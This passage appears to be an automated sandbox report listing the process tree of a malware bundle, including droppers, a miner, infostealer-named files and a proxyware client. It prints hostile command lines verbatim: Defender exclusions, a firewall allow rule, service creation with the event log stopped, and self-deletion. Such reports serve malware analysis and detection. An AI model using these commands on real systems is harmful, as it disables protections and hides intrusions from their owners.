        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe
        11⤵
        
        PID:516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe
        12⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        13⤵
        Runs ping.exe
        
        PID:3432
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U1UO1~1.EXE"
        6⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\U1UO1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U1UO1~1.EXE
        7⤵
        
        PID:2468
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        8⤵
        
        PID:428
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:6172
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE"
      4⤵
      PID:6084
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        5⤵
        
        PID:3324
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:816
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE"
        6⤵
        
        PID:6800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1896
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:7624
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:1692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:6700
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        
        PID:8472
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINER-~1.EXE"
      4⤵
      PID:204
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINER-~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINER-~1.EXE
        5⤵
        
        PID:2384
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "FLWCUERA"
        6⤵
        Launches sc.exe
        
        PID:6360
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:6516
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:6616
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "FLWCUERA"
        6⤵
        Launches sc.exe
        
        PID:6624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MINER-~1.EXE"
        6⤵
        
        PID:6632
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:7048
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe"
      4⤵
      PID:7080
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
        5⤵
        
        PID:7124
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE"
      4⤵
      PID:6312
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MARTIN~1.EXE
        5⤵
        
        PID:6368
      - C:\Windows\system32\svchost.exe
        
        C:\Windows\system32\svchost.exe -k
        6⤵
        
        PID:6396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 520
        6⤵
        Program crash
        
        PID:6496
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sarra.exe"
      4⤵
      PID:6152
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sarra.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\sarra.exe
        5⤵
        
        PID:6204
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE"
      4⤵
      PID:6332
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE
        5⤵
        
        PID:6764
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wefhrf.exe"
      4⤵
      PID:7136
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wefhrf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wefhrf.exe
        5⤵
        
        PID:6240
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
        6⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe
        
        C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        
        PID:3356
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\m.exe"
      4⤵
      PID:6604
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\m.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\m.exe
        5⤵
        
        PID:6676
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\m.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\m.exe
        6⤵
        
        PID:7148
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe"
      4⤵
      PID:6212
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        5⤵
        
        PID:6744
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe"
      4⤵
      PID:1044
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        5⤵
        
        PID:4292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\laplas03.exe
        6⤵
        
        PID:6344
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        7⤵
        
        PID:6580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe"
      4⤵
      PID:6844
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        5⤵
        
        PID:6404
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\APPGAT~1.EXE"
      4⤵
      PID:4764
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\APPGAT~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\APPGAT~1.EXE
        5⤵
        
        PID:5376
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE"
      4⤵
      PID:6532
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NVOKCU~1.EXE
        5⤵
        
        PID:1388
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe"
      4⤵
      PID:2316
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\zxcvb.exe
        5⤵
        
        PID:6408
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe"
      4⤵
      PID:7060
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\net.exe
        5⤵
        
        PID:5384
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTE~1.EXE"
      4⤵
      PID:7132
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CRYPTE~1.EXE
        5⤵
        
        PID:596
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6524
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 596 -s 764
        6⤵
        Program crash
        
        PID:7048
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FULLWO~1.EXE"
      4⤵
      PID:5576
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FULLWO~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FULLWO~1.EXE
        5⤵
        
        PID:4592
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6156
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\csaff.exe"
      4⤵
      PID:6852
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\csaff.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\csaff.exe
        5⤵
        
        PID:7096
      - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
        
        "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
        6⤵
        
        PID:6728
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\COINSU~1.EXE" --squirrel-firstrun
        7⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\COINSU~1.EXE
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\COINSU~1.EXE --squirrel-firstrun
        8⤵
        
        PID:7984
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe" --squirrel-updated 1.0.7
        9⤵
        
        PID:6296
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\CoinSurf\Update.exe" --processStartAndWait "COINSU~1.EXE"
        9⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\CoinSurf\Update.exe
        
        C:\Users\Admin\AppData\Local\CoinSurf\Update.exe --processStartAndWait COINSU~1.EXE
        10⤵
        
        PID:4748
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.7\COINSU~1.EXE"
        11⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.7\COINSU~1.EXE
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.7\COINSU~1.EXE
        12⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe" -key=45787dc0-94c4-4cc8-bd52-cf87ce1b0b0c -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.7-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        13⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe" -key=45787dc0-94c4-4cc8-bd52-cf87ce1b0b0c -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.7-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        13⤵
        
        PID:8248
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe" -key=45787dc0-94c4-4cc8-bd52-cf87ce1b0b0c -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.4-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        9⤵
        
        PID:6840
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\csen.exe" -key=45787dc0-94c4-4cc8-bd52-cf87ce1b0b0c -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.4-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        10⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\csen.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\csen.exe -key=45787dc0-94c4-4cc8-bd52-cf87ce1b0b0c -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.4-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        11⤵
        
        PID:6688
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\csen.exe" --squirrel-firstrun
        7⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\csen.exe
        
        C:\Users\Admin\AppData\Local\CoinSurf\APP-10~1.5\csen.exe --squirrel-firstrun
        8⤵
        
        PID:7540
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe"
      4⤵
      PID:7380
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\crypted.exe
        5⤵
        
        PID:7516
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NZEWXA~1.EXE"
      4⤵
      PID:7840
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NZEWXA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\NZEWXA~1.EXE
        5⤵
        
        PID:7888
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe"
      4⤵
      PID:7108
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\elevator.exe
        5⤵
        
        PID:7316
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE"
      4⤵
      PID:7976
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\MTKFAR~1.EXE
        5⤵
        
        PID:8044
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUST1~1.EXE"
      4⤵
      PID:6224
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUST1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUST1~1.EXE
        5⤵
        
        PID:2788
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe"
      4⤵
      PID:8136
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\IjerkOff.exe
        5⤵
        
        PID:2404
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
        6⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
        7⤵
        
        PID:2092
        
        C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
        
        "C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
        8⤵
        
        PID:6748
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma2.exe"
      4⤵
      PID:7804
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma2.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma2.exe
        5⤵
        
        PID:600
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7336
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe"
      4⤵
      PID:7416
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe
        5⤵
        
        PID:8116
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 760
        6⤵
        Program crash
        
        PID:4364
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 816
        6⤵
        Program crash
        
        PID:2704
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 840
        6⤵
        Program crash
        
        PID:3432
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 848
        6⤵
        Program crash
        
        PID:6448
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 812
        6⤵
        Program crash
        
        PID:8052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 1088
        6⤵
        Program crash
        
        PID:7976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 1132
        6⤵
        Program crash
        
        PID:5584
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 1276
        6⤵
        Program crash
        
        PID:4864
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe" & exit
        6⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c taskkill /im inte.exe /f & erase C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe & exit
        7⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im inte.exe /f
        8⤵
        Kills process with taskkill
        
        PID:7560
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE"
      4⤵
      PID:6796
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\YELLOW~1.EXE
        5⤵
        
        PID:7280
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\%E9%A3~1.EXE"
      4⤵
      PID:6224
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\%E9%A3~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\%E9%A3~1.EXE
        5⤵
        
        PID:6436
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE"
      4⤵
      PID:7632
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        5⤵
        
        PID:6372
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        6⤵
        
        PID:5416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pause
        7⤵
        
        PID:6876
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe"
      4⤵
      PID:2316
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe
        5⤵
        
        PID:6156
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FLT_SH~1.EXE"
      4⤵
      PID:7276
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FLT_SH~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FLT_SH~1.EXE
        5⤵
        
        PID:7500
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE"
      4⤵
      PID:8152
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE
        5⤵
        
        PID:3600
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf"
        6⤵
        
        PID:6232
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\AcroRd32.exe" C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf
        7⤵
        
        PID:2604
      - C:\Users\Admin\AppData\Roaming\Violator.exe
        
        C:\Users\Admin\AppData\Roaming\Violator.exe
        6⤵
        
        PID:1692
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Jacob Jacob.bat & Jacob.bat & exit
        7⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /k move Jacob Jacob.bat & Jacob.bat & exit
        8⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 124
        7⤵
        Program crash
        
        PID:272
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe"
      4⤵
      PID:7792
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        5⤵
        
        PID:5356
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\run.vbs"
        6⤵
        
        PID:5476
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe"
        7⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        8⤵
        
        PID:1720
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe"
        7⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        8⤵
        
        PID:7120
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GREENP~1.EXE"
      4⤵
      PID:6512
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GREENP~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GREENP~1.EXE
        5⤵
        
        PID:512
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        6⤵
        
        PID:7520
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        6⤵
        
        PID:7320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        6⤵
        
        PID:7700
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
      4⤵
      PID:7744
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        5⤵
        
        PID:7840
      - C:\Windows\svchost.exe
        
        "C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
        6⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
        7⤵
        
        PID:2852
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        8⤵
        
        PID:7308
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
